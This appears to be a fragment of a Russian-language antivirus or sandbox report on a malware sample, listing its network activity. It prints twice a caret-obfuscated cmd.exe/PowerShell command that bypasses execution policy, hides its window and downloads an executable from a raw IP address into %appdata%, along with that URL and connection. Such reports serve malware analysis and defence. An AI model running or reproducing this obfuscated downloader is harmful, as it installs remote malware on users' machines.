Техническая информация
- http://86.106.131.141/1.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWe^rS^H^eLL.exE -^EXEc^uTIoNpO^lICy ^B^Y^Pa^sS -^N^o^PrO^FiLE ^-w^iNDoW^s^T^ylE Hi^DD^en (N^eW-oBjEct sYSteM^.Net.wEBC^LIeNT).d^ownL^o^Adfi^l^e('http://86.106.131.141/1.exe','%app...
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /C "PoWe^rS^H^eLL.exE -^EXEc^uTIoNpO^lICy ^B^Y^Pa^sS -^N^o^PrO^FiLE ^-w^iNDoW^s^T^ylE Hi^DD^en (N^eW-oBjEct sYSteM^.Net.wEBC^LIeNT).d^ownL^o^Adfi^l^e('http://86.106.131.141/1.exe','%app...' (со скрытым окном)